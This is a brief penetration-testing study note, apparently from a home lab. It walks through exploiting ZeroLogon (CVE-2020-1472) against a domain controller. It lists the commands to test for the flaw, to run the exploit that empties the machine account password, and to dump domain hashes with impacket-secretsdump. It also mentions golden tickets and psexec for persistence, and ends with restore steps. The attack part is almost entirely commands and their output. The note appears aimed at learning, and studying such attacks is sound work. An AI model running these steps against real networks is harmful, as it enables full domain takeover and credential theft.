ZeroLogon Attacks
PRACTICE ! PRACTICE ! PRACTICE !
This is a serious vulnerability which sets the Domain's Administrator password to null :) - The logic behind this vulnerability deals with Windows Cryptographic Security Measures, Let's first test if the DC is vulnerable to this exploit or not using a python script
$ python3 zerologon_tester.py HYDRA-DC 192.168.169.147
Performing authentication attempts...
Success! DC can be fully compromised by a Zerologon attack.
Since now it's vulnerable, let's exploit the DC :)
$ python3 cve-2020-1472-exploit.py HYDRA-DC 192.168.169.147
Performing authentication attempts...
Target vulnerable, changing account password to empty string
Result: 0
Now how do we check if the Administrator's password is really set to null or not ?
$ impacket-secretsdump -just-dc MARVEL/HYDRA-DC\$@192.168.169.147
Password: <Hit Enter>
[ REDACTED ]
We can pretty much generate Golden tickets for persistance, take advantage of any user on the domain and psexec into them and do anything :)
Now how do we restore this ?
$ impacket-secretsdump administrator@192.168.169.147 -hashes <NT Hash>:<LM Hash>

Copy down the hex value and run the restore python script
$ python3 restorepassword.py MARVEL/HYRDA-DC@HYDRA-DC -target-ip 192.168.169.147 -hexpass <HEX VALUE>
[ REDACTED ]
Change Password OK
Last updated